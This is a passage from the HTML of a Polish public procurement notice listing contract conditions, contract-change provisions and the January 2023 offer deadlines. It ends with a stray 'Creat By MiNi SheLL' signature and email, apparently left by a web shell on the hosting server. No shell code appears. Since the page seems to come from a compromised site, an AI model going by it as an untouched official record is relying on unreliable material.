zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projekt Umowy Załącznik Nr 12-13 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-30 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com